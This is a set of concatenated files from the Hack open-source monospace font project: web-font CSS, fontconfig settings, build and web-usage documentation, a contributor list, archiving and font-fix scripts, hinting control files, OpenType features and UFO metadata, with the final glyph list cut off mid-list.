/*! * Hack typeface https://github.com/source-foundry/Hack * License: https://github.com/source-foundry/Hack/blob/master/LICENSE.md */ /* FONT PATHS * -------------------------- */ @font-face { font-family: 'Hack'; src: url('fonts/hack-regular.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-regular.woff?sha={{ ink }}') format('woff'); font-weight: 400; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bold.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-bold.woff?sha={{ ink }}') format('woff'); font-weight: 700; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-italic.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-italic.woff?sha={{ ink }}') format('woff'); font-weight: 400; font-style: italic; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bolditalic.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-bolditalic.woff?sha={{ ink }}') format('woff'); font-weight: 700; font-style: italic; font-display: swap; }
Hack/config/fontconfig/45-Hack.conf
<?xml version="1.0"?> <!DOCTYPE fontconfig SYSTEM "fonts.dtd"> <fontconfig> <!-- Declare Hack a monospace font --> <alias> <family>Hack</family> <default><family>monospace</family></default> </alias> <!-- if this file is put in user’s configuration, unset sans-serif family --> <match> <test compare="eq" name="family"> <string>sans-serif</string> </test> <test compare="eq" name="family"> <string>Hack</string> </test> <edit mode="delete" name="family"/> </match> </fontconfig>
Markdown
Hack/docs/BUILD.md
## Build dependencies Hack is compiled from UFO v2 spec source files to ttf, woff, and woff2 fonts with free, open source build tools. You can either install the tools manually or use the automated build dependency installation approach documented below. ### Desktop font (ttf) build dependencies To build the Hack desktop fonts (ttf) from source you will need the following build dependencies: - [fontmake](https://github.com/googlei18n/fontmake) Python executable - [fonttools](https://github.com/fonttools/fonttools) Python library - [ttfautohint](https://www.freetype.org/ttfautohint/) executable (includes Harfbuzz and FreeType dependencies) ### Web font (woff + woff2) build dependencies To build the Hack web fonts from source you will need all of the build dependencies listed above for desktop font builds. In addition you will need the following dependencies for the web font build steps: - [sfnt2woff-zopfli](https://github.com/bramstein/sfnt2woff-zopfli) C++ executable - [woff2_compress](https://github.com/source-foundry/woff2) C++ executable ### Automated build dependency installation Install all build dependencies for desktop and web fonts with the following make command: ``` $ make build-with-dependencies ``` This will install all necessary build dependencies and complete a build of all desktop and web fonts. ## Automated font builds After the build dependencies are installed, use make targets from the root of the Hack repository to build font sets. #### Build all desktop and web fonts (including web font subsets) ``` $ make ``` #### Build ttf desktop fonts ``` $ make ttf ``` #### Build all web fonts (includes woff, woff2 with character subsets) ``` $ make webfonts ``` #### Build woff web fonts only (complete sets only) ``` $ make woff ``` #### Build woff2 web fonts only (complete sets only) ``` $ make woff2 ``` #### Build woff and woff2 subsets only ``` $ make subsets ``` ## Build paths ### Desktop fonts (ttf) Desktop fonts are available on the path `build/ttf` from the root of the repository upon completion of your build. ### Web fonts (woff + woff2) Web fonts are available on the path `build/web/fonts` from the root of the repository upon completion of your build. ## Uninstall All build dependencies installed with the automated approaches can be uninstalled with the following commands: ``` $ pip uninstall fontmake $ pip uninstall fonttools $ rm -rf ~/ttfautohint-build $ rm -rf ~/sfnt2woff-zopfli-build $ rm -rf ~/woff2 ``` Here are all of the above commands in a single line that can be copied/pasted into your terminal to accomplish the entire uninstall process: ``` $ pip uninstall fontmake && pip uninstall fonttools && rm -rf ~/ttfautohint-build && rm -rf ~/sfnt2woff-zopfli-build && rm -rf ~/woff2 ``` In cases where a compile did not proceed to completion (e.g. you intentionally exited early or an exception was raised) a temporary directory may still exist in the root of the repository on the path `master_ttf`. This can be removed with: ``` $ rm -rf master_ttf ``` ### Uninstall Details fontmake and fonttools are Python packages and are uninstalled with pip. The FreeType library (including its build dependency Harfbuzz), ttfautohint, sfnt2woff-zopfli, and woff2 are built in directories on your $HOME path. They are not installed on your $PATH (unless of course you have defined $HOME on $PATH) so they **will not** work from the command line with the name of the executable file only (e.g. `$ ttfautohint [file path]`). This is intentional. Repeat execution of the build process cleans up the temporary directory `master_ttf` if found so this step is not mandatory to repeat a build and should not lead to errors with the build.
Markdown
Hack/docs/CONTRIBUTORS.md
# Contributors ## Hack ### Design - Chris Simpkins - David van Gemeren ### Hinting / Instruction Sets - Werner Lemberg - Chris Simpkins ### Basic Latin Set Revisions and Testing - JM - Vladimir Mitrović - Chris Simpkins - David van Gemeren - Joseph Winters ### Extended Set Revisions and Testing - JM - all sets - Dmitry Maslennikov - Cyrillic set - Perry E. Metzger - Greek set - Gleb Nemshilov - Cyrillic set - Vladimir Novoseltev - Cyrillic set - Timothée Poisot - Greek set - Damien Pollet - Esperanto set - Michael Schierl - MES-1 set, Esperanto set - Chris Simpkins - all sets - Roman Sotnikov - Cyrillic set - Ivan Starkov - Cyrillic set - Nikos Tzanos - Greek set - David van Gemeren - all sets - Alexei Volkov - Cyrillic set - @achkasov - Cyrillic set - @Bfgeshka - Cyrillic set - @rafaeln - Kĩsêdjê set - @xstee (Leonid) - Cyrillic set ### Powerline Glyph Set Revisions and Testing - Carlo Abelli - Justin Anderson - Matthias Bilger - Alpha Chen - Benjamin Chrétien - Marvin Frommhold - Tim Heckman - Serkan Hosca - Jon Linklater-Johnson - Giovanni Lanzani - James T. Lee - Caleb Maclennan - Joel McCance - Robin McCorkell - Chris Simpkins - Mack Stump - Daniele Tricoli - David van Gemeren ### Build / Post-Compilation Modifications Workflow - Chris Simpkins ### Windows Installation & Testing - Michael "Tex" Hex ### CI Testing - Peter Oliver - Chris Simpkins ### Scripting - Chris Clauss - Jorg Heymans - JM - Chris Simpkins ### Web Development - Dmitry Akulov - JM - Martin Kolarik - Chris Simpkins - David van Gemeren ### Redistribution & Installation - Guilherme Amadio - Linux - Helio Chissini de Castro - Linux - Mélanie Chauvel - Linux - Samina Fu - cdnjs - Fabian Greffrath - Linux - Michael "Tex" Hex - Windows - Paride Legovini - Linux - Caleb Maclennan - Linux, OS X - Shawn Starr - Linux - @rahilwazir - Linux - Jakub Žitný - NPM ### Licensing - Dave Crossland - Fabian Greffrath - Francesco Poli - Chris Simpkins - Nicolas Spalinger - Paul Wise ### Versioning - Dave Crossland - Michael "Tex" Hex - Cosimo Lupo - JM - Chris Simpkins - David van Gemeren ### Documentation - Guilherme Amadio - Tom Byrer - Michael "Tex" Hex - Jeremy Huang - Caleb Maclennan - Yevgeniy Shevekhman - Chris Simpkins - Marc Telesha - David van Gemeren ### DejaVu Upstream Team - Štěpán Roh - Sander Vesik - Andrey Panov - Ben Laenen - Tim May - David Jež - David Lawrence Ramsey - Danilo Šegan - Eugeniy Meshcheryakov - Keenan Pepper - Denis Jacquerye - Gee Fung Sit - Rémy Oudompheng - Roozbeh Pournader - Vasek Stoudulka - Ognan Kulev - John Karp - Lars Christensen ### Bitstream Vera Upstream Author - Jim Lyles ### Testing - Jameel Al-Aziz - Serj Alimsky - Aric Belsito - Matthias Bilger - Sven Busse - P.F. Chimento - Ryan Dlugosz - Felix Dreissig - Gavin Eadie - Jason Evans - Daniel Fitzpatrick - Thilo Frommeyer - David van Gemeren - Trevor Hayes - Michael "Tex" Hex - Jorg Heymans - Alexander Hofbauer - Ken J. - Jacek Jędrzejewski - Markus Jevring - Pete Johanson - Anton Kalmykov - Serg Koles - Zach Langbert - Fabio Alessandro Locati - JM - Jesús Martínez - Dave Merrill - Leo Neeson - Darius Niemczyk - Fernanda Parisi - Adam Quaile - Christopher Rucinski - Kevin S - Frank Sachsenheim - Marek Šesták - Chris Simpkins - Rogier Spieker - Günther Stadler - Christopher J. Stehno - James Taylor - Manuel Uberti - David van Gemeren - Matthew Wesley - Gustaf Zetterlund - 张标 (@angrilove) - @duud - @haktrik - @hrj - @iamklutch - @legovini - @MaxKh - @Paul-v-H - @schauveau - @ScuzzyEye - @tbrisbane
Markdown
Hack/docs/WEBFONT_USAGE.md
### Web Font Usage Hack web fonts are released in woff and woff2 formats. They include a complete Hack character set build and a subset build that includes ASCII, Latin-1, Latin Extended A, General Punctuation, and Currency Unicode character set support. The latter build set is smaller in size and is intended to improve page loading times when you do not need the entire Hack character set. You can view the rendering of the web fonts at a range of sizes on the [Hack web font type specimen](http://source-foundry.github.io/Hack/font-specimen.html). #### Hack by CDN Thanks to the generous gangs at [jsDelivr](https://github.com/jsdelivr/jsdelivr) and [cdnjs](https://www.cdnjs.com), you can use a CDN to include Hack on your site with a single stylesheet link in the head of your HTML files. There is no need to download font files from the repository or serve them from your web server. Instructions for web font CDN use are available on our README page and you can use either of the following CDN: [![jsDelivr](https://img.shields.io/badge/jsDelivr-Hack_web_font_CDN-blue.svg?style=flat-square)](https://www.jsdelivr.com/package/npm/hack-font) [![cdnjs](https://img.shields.io/badge/cdnjs-Hack_web_font_CDN-blue.svg?style=flat-square)](https://cdnjs.com/libraries/hack-font) #### Host Hack Font Files on Your Server The following instructions are for those who prefer not to use the web font CDN approach described above. If you would like to host the web fonts and CSS files yourself, please follow the instructions below. Download the [latest release of the Hack web fonts and associated CSS files](https://github.com/source-foundry/Hack/releases/latest). The web font archive path structure is as follows: ``` web ├── fonts │   ├── hack-bold-subset.woff │   ├── hack-bold-subset.woff2 │   ├── hack-bold.woff │   ├── hack-bold.woff2 │   ├── hack-bolditalic-subset.woff │   ├── hack-bolditalic-subset.woff2 │   ├── hack-bolditalic.woff │   ├── hack-bolditalic.woff2 │   ├── hack-italic-subset.woff │   ├── hack-italic-subset.woff2 │   ├── hack-italic.woff │   ├── hack-italic.woff2 │   ├── hack-regular-subset.woff │   ├── hack-regular-subset.woff2 │   ├── hack-regular.woff │   └── hack-regular.woff2 ├── hack-subset.css └── hack.css ``` Push one of the CSS files and the `fonts` directory to your web server, then import the CSS file in the `head` section of the HTML where you would like to use it. Replace `path/to/` with the actual path to your css directory. ##### Subset web font import ```html <link rel="stylesheet" href="path/to/hack-subset.css"> ``` ##### Full character set import ```html <link rel="stylesheet" href="path/to/hack.css"> ``` You can alter the path to the Hack files (e.g. place the files in a `hack` resource subdirectory); however, please make sure that you preserve the relative file paths included in the release archive (*or modify the paths to the font files included in the CSS files*). Then style your text by including `Hack` in the appropriate `font-family` property of your CSS. For example: ```css code { font-family: Hack, monospace; } ``` The **bold**, *oblique*, and <b><i>bold oblique</i></b> text styles are formatted with HTML using `<b>text block</b>`, `<i>text block</i>`, and `<b><i>text block</i></b>` HTML tags, respectively.
Shell Script
Hack/postbuild_processing/archive_prep/archiver.sh
#!/bin/sh # //////////////////////////////////////////////////////////////////// # # archiver.sh # A shell script that packages .zip, tar.gz, and tar.xz font archives # Copyright 2018 Christopher Simpkins # MIT License # # Usage: ./archiver.sh # # //////////////////////////////////////////////////////////////////// HACK_VERSION="v3.003" HACK_ARCHIVES_DIR="../../../Hack-archives" HACK_BUILD_DIR="../../build" # Make build directory the current working directory cd "$HACK_BUILD_DIR" || exit 1 # Cleanup Hack-archives directory if present if [ -d "$HACK_ARCHIVES_DIR" ]; then rm -rf "$HACK_ARCHIVES_DIR" fi # Make the archive directory mkdir "$HACK_ARCHIVES_DIR" # Build ttf zip archive zip -r "${HACK_ARCHIVES_DIR}/Hack-${HACK_VERSION}-ttf.zip" ttf -x "*.DS_Store" # Build web font zip archive zip -r "${HACK_ARCHIVES_DIR}/Hack-${HACK_VERSION}-webfonts.zip" web -x "*.DS_Store" # Build ttf tar.gz archive tar -c --exclude=".DS_Store" --exclude="./.DS_Store" --exclude="./*/.DS_Store" -vzf "${HACK_ARCHIVES_DIR}/Hack-${HACK_VERSION}-ttf.tar.gz" ttf # Build web font tar.gz archive tar -c --exclude=".DS_Store" --exclude="./.DS_Store" --exclude="./*/.DS_Store" -vzf "${HACK_ARCHIVES_DIR}/Hack-${HACK_VERSION}-webfonts.tar.gz" web # Build ttf tar.xz archive tar -c --exclude=".DS_Store" --exclude="./.DS_Store" --exclude="./*/.DS_Store" -C ttf . | xz --extreme -9 --force > "${HACK_ARCHIVES_DIR}/Hack-${HACK_VERSION}-ttf.tar.xz" # Build web font tar.xz archive tar -c --exclude=".DS_Store" --exclude="./.DS_Store" --exclude="./*/.DS_Store" -C web . | xz --extreme -9 --force > "${HACK_ARCHIVES_DIR}/Hack-${HACK_VERSION}-webfonts.tar.xz"
Python
Hack/postbuild_processing/fixes/fix-dsig.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 2013,2016 The Font Bakery Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # See AUTHORS.txt for the list of Authors and LICENSE.txt for the License. # Adapted for the Hack typeface build workflow by Chris Simpkins from __future__ import print_function, unicode_literals import sys import os from fontTools import ttLib def set_empty_dsig(ttFont): newDSIG = ttLib.newTable("DSIG") newDSIG.ulVersion = 1 newDSIG.usFlag = 0 newDSIG.usNumSigs = 0 newDSIG.signatureRecords = [] ttFont.tables["DSIG"] = newDSIG def main(argv): for path in argv: if not os.path.exists(path): sys.stderr.write("[fix-dsig.py] ERROR: " + path + " is not a valid path to a font file") sys.exit(1) else: font = ttLib.TTFont(path) set_empty_dsig(font) font.save(path) print(path + " - successful DSIG table fix") if __name__ == '__main__': main(sys.argv[1:])
Python
Hack/postbuild_processing/fixes/fix-fstype.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 2016 The Fontbakery Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Adapted for the Hack typeface build workflow by Chris Simpkins import os import sys from fontTools.ttLib import TTFont def main(argv): for path in argv: if not os.path.exists(path): sys.stderr.write("[fix-fstype.py] ERROR: " + path + " is not a valid path to a font file") sys.exit(1) else: font = TTFont(path) font['OS/2'].fsType = 0 font.save(path) print(path + " - successful fstype fix") if __name__ == '__main__': main(sys.argv[1:])
Text
Hack/postbuild_processing/tt-hinting/Hack-Bold-TA.txt
# U+0021 exclam glyph ID 580 uni0021 touch 22,23,24,25 y -0.5 @14 # U+0025 percent glyph ID 762 uni0025 touch 0,1,16 y 0.75 @10,11 uni0025 touch 23,24,25 y 0.25 @10,11 uni0025 touch 17,18,32,46,47,48 y 0.5 @10,11 uni0025 touch 57,58,71 y -0.25 @10,11 uni0025 touch 33,34,35,36 y 0.5 @10,11 uni0025 touch 63,64,65 y 0.75 @10,11 uni0025 touch 23,24,25,63,64,65 y 0.5 @14 uni0025 touch 17,18,32,57,58,71 y -0.5 @14 # U+002B plus glyph ID 765 uni002B touch 0,1,2,3,6,7,8,9 y 0.5 @10,11 # U+0038 eight glyph ID 556 uni0038 touch 41,42,43 y 0.25 @12,13,14 uni0038 touch 34,35,48 y -0.25 @12,13,14
Text
Hack/postbuild_processing/tt-hinting/Hack-Italic-TA.txt
# [ U+002B ] adjust the space in the vertical stroke of bar glyph # bar touch 4,7 y 0.5 @ 6 # bar touch 4,7 y 0.25 @ 7 # bar touch 4,7 y 1 @ 10,11,12,13,14 # bar touch 0,3 y -0.25 @ 6 # bar touch 0,3 y -0.5 @ 7 # bar touch 0,3 y -1 @ 10,14 # # U+0025 percent glyph 750 uni0025 touch 0,1,21,22,23,39 y 0.5 @10 uni0025 touch 40 y 0.75 @10 uni0025 touch 41,42,43 y 0.5 @10 uni0025 touch 51,52,53,72,73,74 y 0.5 @10 uni0025 touch 40,43 y -0.75 @11 uni0025 touch 41,42 y 0.75 @11 uni0025 touch 0,1,21,22,23,39 y -0.25 @14 uni0025 touch 8,9,10,30,31,32 y 0.25 @14 uni0025 touch 51,52,53,72,73,74 y -0.5 @14 uni0025 touch 40,41,42,43 y -0.25 @14
Text
Hack/postbuild_processing/tt-hinting/Hack-Regular-TA.txt
# U+0023 numbersign glyph ID 582 uni0023 touch 0,1,2,3,18,19,20,21,22,23,24,25,26,27,28,31 x 0.25 @ 13 # U+0025 percent glyph 761 uni0025 touch 0,1,21,22,23,39 y 0.5 @10 uni0025 touch 40 y 0.75 @10 uni0025 touch 41,42,43 y 0.5 @10 uni0025 touch 51,52,53,70,71,72 y 0.5 @10 uni0025 touch 40,43 y -0.75 @11 uni0025 touch 41,42 y 0.75 @11 uni0025 touch 0,1,21,22,23,39 y -0.25 @14 uni0025 touch 8,9,10,30,31,32 y 0.25 @14 uni0025 touch 51,52,53,70,71,72 y -0.5 @14 uni0025 touch 40,41,42,43 y -0.25 @14 # U+002B plus glyph ID 764 uni002B touch 4,5,10,11 y 0.5 @12 uni002B touch 4,5 y 1.0 @13 # U+0030 zero glyph ID 548 uni0030 touch 35,36,45,46,47,56 y -0.5 @8 uni0030 touch 35,36,56 y -1.0 @12,13,14
Hack/source/Hack-Bold.ufo/features.fea
# Prefix: Languagesystems languagesystem DFLT dflt; languagesystem latn dflt; languagesystem latn MOL ; languagesystem latn ROM ; # Prefix: Prefix @aalt1 = [\zero \one \two \three \four \five \six \seven \eight \nine]; @subs1 = [\zero.subs \one.subs \two.subs \three.subs \four.subs \five.subs \six.subs \seven.subs \eight.subs \nine.subs]; @sups1 = [\uni2070 \uni00B9 \uni00B2 \uni00B3 \uni2074 \uni2075 \uni2076 \uni2077 \uni2078 \uni2079]; # @case1 = [\exclamdown \questiondown \uni2E18 \uni0304 \uni0306 \uni0307 \uni030B \uni030F \uni0311]; # @case2 = [\exclamdown.case \questiondown.case \uni2E18.case \uni0304.case \uni0306.case \uni0307.case \uni030B.case \uni030F.case \uni0311.case]; feature aalt { feature locl; feature subs; feature sinf; feature sups; feature ordn; } aalt; feature locl { # Localized Forms script latn; # Latin language MOL exclude_dflt; # Moldavian sub [Scedilla scedilla] by [uni0218 uni0219]; language ROM exclude_dflt; # Romanian sub [Scedilla scedilla] by [uni0218 uni0219]; } locl; feature subs { # Subscript # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } subs; feature sinf { # Scientific Inferiors # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } sinf; feature sups { # Superscript # DEFAULT sub @aalt1 by @sups1; script latn; # Latin sub @aalt1 by @sups1; language MOL ; # Moldavian language ROM ; # Romanian } sups; feature frac { # Fractions # DEFAULT sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; script latn; # Latin sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; language MOL ; # Moldavian language ROM ; # Romanian } frac; feature ordn { # Ordinals # DEFAULT sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; script latn; # Latin sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; language MOL ; # Moldavian language ROM ; # Romanian } ordn; #feature case { # # Case-Sensitive Forms # # DEFAULT # sub @case1 by @case2; # script latn; # Latin # sub @case1 by @case2; # language MOL ; # Moldavian # language ROM ; # Romanian #} case;
Hack/source/Hack-Bold.ufo/fontinfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>ascender</key> <integer>1556</integer> <key>capHeight</key> <integer>1495</integer> <key>copyright</key> <string>Copyright (c) 2018 Source Foundry Authors / Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved.</string> <key>descender</key> <integer>-492</integer> <key>familyName</key> <string>Hack</string> <key>macintoshFONDFamilyID</key> <integer>128</integer> <key>macintoshFONDName</key> <string>Hack</string> <key>note</key> <string></string> <key>openTypeHeadCreated</key> <string>2017/10/23 12:00:00</string> <key>openTypeHeadFlags</key> <array> </array> <key>openTypeHheaAscender</key> <integer>1901</integer> <key>openTypeHheaDescender</key> <integer>-483</integer> <key>openTypeHheaLineGap</key> <integer>0</integer> <key>openTypeNameCompatibleFullName</key> <string>Hack Bold</string> <key>openTypeNameDescription</key> <string></string> <key>openTypeNameDesigner</key> <string>Source Foundry Authors</string> <key>openTypeNameDesignerURL</key> <string>https://github.com/source-foundry/Hack</string> <key>openTypeNameLicense</key> <string>The work in the Hack project is Copyright 2018 Source Foundry Authors and licensed under the MIT License The work in the DejaVu project was committed to the public domain. Bitstream Vera Sans Mono Copyright 2003 Bitstream Inc. and licensed under the Bitstream Vera License with Reserved Font Names "Bitstream" and "Vera" MIT License Copyright (c) 2018 Source Foundry Authors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. BITSTREAM VERA LICENSE Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved. Bitstream Vera is a trademark of Bitstream, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of the fonts accompanying this license ("Fonts") and associated documentation files (the "Font Software"), to reproduce and distribute the Font Software, including without limitation the rights to use, copy, merge, publish, distribute, and/or sell copies of the Font Software, and to permit persons to whom the Font Software is furnished to do so, subject to the following conditions: The above copyright and trademark notices and this permission notice shall be included in all copies of one or more of the Font Software typefaces. The Font Software may be modified, altered, or added to, and in particular the designs of glyphs or characters in the Fonts may be modified and additional glyphs or characters may be added to the Fonts, only if the fonts are renamed to names not containing either the words "Bitstream" or the word "Vera". This License becomes null and void to the extent applicable to Fonts or Font Software that has been modified and is distributed under the "Bitstream Vera" names. The Font Software may be sold as part of a larger software package but no copy of one or more of the Font Software typefaces may be sold by itself. THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL BITSTREAM OR THE GNOME FOUNDATION BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER DEALINGS IN THE FONT SOFTWARE. Except as contained in this notice, the names of Gnome, the Gnome Foundation, and Bitstream Inc., shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Font Software without prior written authorization from the Gnome Foundation or Bitstream Inc., respectively. For further information, contact: fonts at gnome dot org.</string> <key>openTypeNameLicenseURL</key> <string>https://github.com/source-foundry/Hack/blob/master/LICENSE.md</string> <key>openTypeNameManufacturer</key> <string>Source Foundry</string> <key>openTypeNameManufacturerURL</key> <string>https://github.com/source-foundry</string> <key>openTypeNamePreferredFamilyName</key> <string>Hack</string> <key>openTypeNamePreferredSubfamilyName</key> <string>Bold</string> <key>openTypeNameSampleText</key> <string></string> <key>openTypeNameUniqueID</key> <string>SourceFoundry: Hack Bold: 2018</string> <key>openTypeNameVersion</key> <string>Version 3.003</string> <key>openTypeOS2CodePageRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>4</integer> <integer>7</integer> <integer>8</integer> <integer>29</integer> <integer>48</integer> <integer>49</integer> <integer>50</integer> <integer>52</integer> <integer>54</integer> <integer>55</integer> <integer>56</integer> <integer>57</integer> <integer>58</integer> <integer>59</integer> <integer>60</integer> <integer>62</integer> <integer>63</integer> </array> <key>openTypeOS2FamilyClass</key> <array> <integer>0</integer> <integer>0</integer> </array> <key>openTypeOS2Panose</key> <array> <integer>2</integer> <integer>11</integer> <integer>8</integer> <integer>9</integer> <integer>3</integer> <integer>2</integer> <integer>2</integer> <integer>2</integer> <integer>2</integer> <integer>4</integer> </array> <key>openTypeOS2Selection</key> <array> </array> <key>openTypeOS2StrikeoutPosition</key> <integer>530</integer> <key>openTypeOS2StrikeoutSize</key> <integer>102</integer> <key>openTypeOS2SubscriptXOffset</key> <integer>0</integer> <key>openTypeOS2SubscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SubscriptYOffset</key> <integer>153</integer> <key>openTypeOS2SubscriptYSize</key> <integer>1228</integer> <key>openTypeOS2SuperscriptXOffset</key> <integer>0</integer> <key>openTypeOS2SuperscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SuperscriptYOffset</key> <integer>716</integer> <key>openTypeOS2SuperscriptYSize</key> <integer>1228</integer> <key>openTypeOS2Type</key> <array> <integer>0</integer> </array> <key>openTypeOS2TypoAscender</key> <integer>1556</integer> <key>openTypeOS2TypoDescender</key> <integer>-492</integer> <key>openTypeOS2TypoLineGap</key> <integer>410</integer> <key>openTypeOS2UnicodeRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>5</integer> <integer>6</integer> <integer>7</integer> <integer>9</integer> <integer>10</integer> <integer>24</integer> <integer>26</integer> <integer>29</integer> <integer>31</integer> <integer>32</integer> <integer>33</integer> <integer>35</integer> <integer>36</integer> <integer>37</integer> <integer>38</integer> <integer>39</integer> <integer>43</integer> <integer>44</integer> <integer>45</integer> <integer>47</integer> <integer>69</integer> </array> <key>openTypeOS2VendorID</key> <string>SRC</string> <key>openTypeOS2WeightClass</key> <integer>700</integer> <key>openTypeOS2WidthClass</key> <integer>5</integer> <key>openTypeOS2WinAscent</key> <integer>1901</integer> <key>openTypeOS2WinDescent</key> <integer>483</integer> <key>postscriptBlueFuzz</key> <integer>0</integer> <key>postscriptBlueScale</key> <real>0.036999999999999998</real> <key>postscriptBlueShift</key> <integer>14</integer> <key>postscriptBlueValues</key> <array> <integer>-29</integer> <integer>0</integer> <integer>1120</integer> <integer>1149</integer> <integer>1493</integer> <integer>1520</integer> </array> <key>postscriptFontName</key> <string>Hack-Bold</string> <key>postscriptForceBold</key> <true/> <key>postscriptFullName</key> <string>Hack Bold</string> <key>postscriptIsFixedPitch</key> <true/> <key>postscriptOtherBlues</key> <array> <integer>-440</integer> <integer>-426</integer> </array> <key>postscriptStemSnapH</key> <array> <integer>260</integer> <integer>172</integer> <integer>225</integer> </array> <key>postscriptStemSnapV</key> <array> <integer>295</integer> <integer>114</integer> <integer>160</integer> <integer>236</integer> </array> <key>postscriptUnderlinePosition</key> <integer>-220</integer> <key>postscriptUnderlineThickness</key> <integer>90</integer> <key>postscriptUniqueID</key> <integer>-1</integer> <key>styleMapFamilyName</key> <string>Hack</string> <key>styleMapStyleName</key> <string>bold</string> <key>styleName</key> <string>Bold</string> <key>trademark</key> <string></string> <key>unitsPerEm</key> <integer>2048</integer> <key>versionMajor</key> <integer>3</integer> <key>versionMinor</key> <integer>003</integer> <key>xHeight</key> <integer>1120</integer> </dict> </plist>
Hack/source/Hack-Bold.ufo/lib.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>public.glyphOrder</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</string> <string>Acircumflex</string> <string>Adieresis</string> <string>Agrave</string> <string>Amacron</string> <string>Aogonek</string> <string>Aring</string> <string>Atilde</string> <string>AE</string> <string>B</string> <string>C</string> <string>Cacute</string> <string>Ccaron</string> <string>Ccedilla</string> <string>Cdotaccent</string> <string>D</string> <string>Eth</string> <string>Dcaron</string> <string>Dcroat</string> <string>E</string> <string>Eacute</string> <string>Ecaron</string> <string>Ecircumflex</string> <string>Edieresis</string> <string>Edotaccent</string> <string>Egrave</string> <string>Emacron</string> <string>Eogonek</string> <string>F</string> <string>G</string> <string>Gbreve</string> <string>Gcaron</string> <string>uni0122</string> <string>Gdotaccent</string> <string>H</string> <string>Hbar</string> <string>I</string> <string>Iacute</string> <string>Icircumflex</string> <string>Idieresis</string> <string>Idotaccent</string> <string>Igrave</string> 